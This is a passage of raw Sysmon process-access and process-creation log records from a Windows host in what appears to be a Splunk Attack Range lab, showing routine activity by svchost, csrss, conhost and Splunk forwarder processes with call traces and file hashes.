Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F3-60EB-F679-00000000D001}3548C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:27.623{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8F3-60EB-F679-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F3-60EB-F679-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.608{0C1E0330-F8F3-60EB-F679-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.092{0C1E0330-F8F2-60EB-F579-00000000D001}35363868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.420{0C1E0330-F8F4-60EB-F779-00000000D001}38242900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F4-60EB-F779-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.310{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:28.295{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:28.295{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:28.295{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8F4-60EB-F779-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.295{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F4-60EB-F779-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 